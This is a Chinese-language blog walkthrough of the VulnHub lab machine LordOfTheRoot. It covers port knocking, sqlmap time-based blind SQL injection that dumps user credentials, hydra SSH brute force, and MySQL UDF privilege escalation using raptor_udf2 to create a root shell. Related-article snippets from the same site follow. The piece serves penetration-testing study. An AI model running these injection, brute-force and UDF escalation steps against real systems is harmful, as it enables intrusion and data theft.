vulnhub(13):LordOfTheRoot(sql时间盲注、mysql udf提权)

最新推荐文章于 2024-09-28 13:51:46 发布
最新推荐文章于 2024-09-28 13:51:46 发布
阅读量968 收藏 18
点赞数 17
分类专栏: vulnhub oscp-like靶场 文章标签: mysql 数据库 web安全 网络安全 安全 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142454816
版权

端口

nmap主机发现
nmap -sn 192.168.72.0/24
​
Nmap scan report for 192.168.72.170
Host is up (0.00020s latency).
​
170是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.72.170 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT      STATE SERVICE                                                                                    
22/tcp open  ssh                                                     
 
发现开放1个端口
nmap -Pn -sU 192.168.72.170 -p- --min-rate 
尝试udp扫描,当然结果什么都没有
​
说不定ssh可以登录:
ssh 192.168.72.170

看字:knock friend to enter
简单介绍一下:knock工作就是管理员设定的按照一定规则去按顺序去knock某些端口后,会执行管理员写好的代码
主要用于隐蔽,在这里很可能是knock某些端口后,会执行其他开放端口的代码
(介绍一下应用场景,与当前靶机无关,比如为了隐蔽使ssh端口默认处于关闭状态,knock特定规则的端口ssh端口开启,然后为了再次隐蔽,knock特定端口使得ssh用完后关闭,当然knock端口可以由管理员设置)
​
看到下方的 Easy as 1,2,3
我们直接:knock 192.168.72.170 1 2 3 
​
nmap再扫描一次
PORT     STATE SERVICE
22/tcp   open  ssh
1337/tcp open  waste
​
nmap -sT -sC -sV -O -p22,1337 -oA nmap/info 192.168.72.170 
​
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3c3de38e35f9da7420efaa494a1deddd (DSA)
|   2048 85946c87c9a8350f2cdbbbc13f2a50c1 (RSA)
|   256 f3cdaa1d05f21e8c618725b6f4344537 (ECDSA)
|_  256 34ec16dda7cf2a8645ec65ea05438921 (ED25519)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

立足

主页是张图片,主页源代码页面就是图片链接,其他什么都没有,尝试查看其他目录
​
robots.txt:
居然也是张图片,查看源代码页面:
​
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
​
推荐网站:https://hashes.com/zh/decrypt/hash
​
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh:Lzk3ODM0NTIxMC9pbmRleC5waHA
​
Lzk3ODM0NTIxMC9pbmRleC5waHA:/978345210/index.php

抓包sqlmap跑一下,sqlmap真吊,站在巨人得肩膀上
​
POST /978345210/ HTTP/1.1
Host: 192.168.72.170:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://192.168.72.170:1337
Connection: close
Referer: http://192.168.72.170:1337/978345210/
Cookie: PHPSESSID=hniik3khi6l5fh1f9asb58sk30
Upgrade-Insecure-Requests: 1
​
username=asdas&password=asdasd&submit=+Login+
sqlmap -r raj --batch --dbs --time-sec 1
​
这里--time-sec 1是因为发现了时间盲注,为了节约时间设置等待时间为1
​
4个数据库
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp
​
看Webapp数据库:sqlmap -r raj --batch --dbs -D Webapp -tables --time-sec 1
​
一个表:
Database: Webapp
[1 table]
+-------+
| Users |
+-------+
​
看这个表的字段:
sqlmap -r raj --batch --dbs -D Webapp -T Users --columns --time-sec 1 
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(10)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
​
字段不多直接--dump-all这张表:sqlmap -r raj --batch --dbs -D Webapp -T Users --dump-all --time-sec 1
​
Database: Webapp
Table: Users
[5 entries]
+----+------------------+----------+
| id | password         | username |
+----+------------------+----------+
| 1  | iwilltakethering | frodo    |
| 2  | MyPreciousR00t   | smeagol  |
| 3  | AndMySword       | aragorn  |
| 4  | AndMyBow         | legolas  |
| 5  | AndMyAxe         | gimli    |
+----+------------------+----------+
制作字典
将
+----+------------------+----------+
| id | password         | username |
+----+------------------+----------+
| 1  | iwilltakethering | frodo    |
| 2  | MyPreciousR00t   | smeagol  |
| 3  | AndMySword       | aragorn  |
| 4  | AndMyBow         | legolas  |
| 5  | AndMyAxe         | gimli    |
+----+------------------+----------+
放在user_pass.txt
​
然后分别制作password.txt 和username.txt字典:
cat user_pass.txt | awk -F '|' {'print $3'} | tr -d ' ' > password.txt
cat user_pass.txt | awk -F '|' {'print $4'} | tr -d ' ' > username.txt
hydra爆破
hydra -L username.txt -P password.txt 192.168.72.170 ssh 
​
结果:[22][ssh] host: 192.168.72.170   login: smeagol   password: MyPreciousR00t

提权

有sql注入我们直接前往:/var/www
​
在/var/www/978345210/login.php我们看到如下内容:
$db = new mysqli('localhost', 'root', 'darkshadow', 'Webapp');
​
mysql用root登录,看看是否udf提权
searchsploit mysql udf
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) 
​
mysql udf是mysql的用户自定义函数,我们将函数存放在动态链接库中,那么这个动态链接库的所有者就是mysql创建udf时所使用的用户,恰好现在以root身份登录mysql,代表着我们能使用root将udf写入一个动态链接库,提权需要调用这个恶意函数,这还需要我们借助mysql的root权限来调用恶意函数
mysql udf提权步骤
1.编译:
$ gcc -g -c raptor_udf2.c
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
​
2.登录:mysql -u root -p
​
3.创建表(这个表的作用就是借助mysql的root用户将恶意动态链接库写入/usr/lib/下):
mysql> use mysql;
mysql> create table foo(line blob);
​
4.写入恶意动态链接库:
mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
​
5.创建udf
mysql> create function do_system returns integer soname 'raptor_udf2.so';
​
6.查看是否成功
mysql> select * from mysql.func;
​
7.执行提权代码
mysql> select do_system('cp /bin/sh /tmp/rootsh;chmod +x /tmp/rootsh');
这里说明一下为什么不拷贝/bin/bash,因为执行后bash会比对ruid和euid是否相同,如果不相同就降权到ruid,我们执行的话ruid是smeagol而euid是root,降权到smeagol
​
root
cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
mysql udf提权条件:
​
1.可登录的mysql用户具有root权限
2.secure_file_priv 有些设置选项:
SHOW VARIABLES LIKE 'secure_file_priv';
如果为空,不做目录限制,即任何目录均可以。
如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。目录必须已存在,MySQL 不会自动创建该目录。
如果设置为 NULL,MySQL 服务器禁止导入与导出功能。
​
次靶机
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
anddddoooo
关注
专栏目录
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
MySQL提权UDF提权
2301_76227305的博客
06-08 1581
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
MysqlUDF提权
热门推荐
内心不种满鲜花就会长满杂草
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
MySQLUDF提权复现
未完成的歌~的博客
09-03 987
UDF(Userfined function)用户自定义函数,是MySQL的一个扩展接口,用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用。
MySQL数据库UDF提权学习
Goodric的博客
07-21 1247
数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。 除Access数据库外,其他数据库基本都存在数据库提权的可能。
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 3099
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
vulnhubmysql_udf提权
qq_36585338的博客
03-09 427
Linux 提权数据库MYSQL_UDF
Mysql udf提权靶场-vulnhub Raven2
m0_62399876的博客
08-18 1730
最近学习的时候学到了udf提权,想着来实操一下。同时也记录一下我的理解。udf(User Defined Function)是用户自定义函数,是通过添加新函数,对MYSQL的功能进行扩充。udf的原意是为了让开发者能够自己写方便自己的函数。...
sqlmap mysql udf提权_利用sqlmap命令--sql-shell进行mysql提权的小方法之udf提权
weixin_35861708的博客
01-19 1746
udf提权1.原理UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限2.利用条件Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于c:winntsystem32...
mysql udf提权
weixin_60719780的博客
03-16 1445
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shell的udf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
Python酷玩之旅_如何连接MySQLmysql-connector-python)
splendid_java的专栏
09-24 712
Python作为数据科学、机器学习等领域的必选武器,备受各界人士的喜爱。当你面对不同类型、存储于各类介质的数据时,第一时间是不是要让它亮个相?做个统计,画个图表,搞个报表… 等等。正如Java中的JdbcDriver一样,Python中也有同样角色的库。比如今天博主正要介绍的,它是Python中操作数据库的常用工具,我们先从它说起吧,Let’s go~Python中连接mysql有各种工具支持,博主推荐使用,它是MySQL官方提供的标准工具,依赖少,查询方便。
MySQL 基础语法详解
weixin_64178283的博客
09-25 1288
DDL 用于定义数据库和表结构,是数据库操作的基础。1. CREATE: 创建数据库或数据表CREATE DATABASE 数据库名;CREATE TABLE 表名 (列名1 数据类型 约束,列名2 数据类型 约束,...USE school;-- 选择数据库id INT PRIMARY KEY AUTO_INCREMENT, -- 学生ID,主键,自增name VARCHAR(255) NOT NULL, -- 学生姓名,非空约束age INT, -- 学生年龄。
DC00021基于springboot问卷调查管理系统web项目调查问卷管理系统MySQL(附源码)
最新发布
黄昏下的黎明的博客
09-28 553
DC00021基于springboot问卷调查管理系统web项目调查问卷管理系统MySQL
遨游信息技术的浩瀚宇宙:探索MySQL的深邃奥秘
2401_85044049的博客
09-24 673
在信息技术的浩瀚宇宙中,MySQL犹如一颗璀璨的星辰,以其稳定、高效、灵活的特性,照亮了无数开发者与数据管理者的前行之路。作为关系型数据库管理系统的佼佼者,MySQL不仅承载着海量数据的存储与管理任务,更是推动数据驱动决策、实现业务智能化的关键力量。今天,让我们一同踏入MySQL的深邃世界,探索那些在实际学习中遇到的有意义的问题与挑战。
MySQL篇(面试题 - 答问形式)
wlcass zhengge blog
09-24 669
了解过索引吗?(什么是索引)嗯,索引在项目中还是比较常见的,它是帮助MySQL高效获取数据的数据结构,主要是用来提高数据检索的效率,降低数据库的IO成本,同时通过索引列对数据进行排序,降低数据排序的成本,也能降低了CPU的消耗。什么是聚簇索引什么是非聚簇索引?好的~,聚簇索引主要是指数据与索引放到一块,B+树的叶子节点保存了整行数据,有且只有一个,一般情况下主键在作为聚簇索引的非聚簇索引值的是数据与索引分开存储,B+树的叶子节点保存对应的主键,可以有多个,一般我们自己定义的索引都是非聚簇索引。
mysql udf 提权
03-06
UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值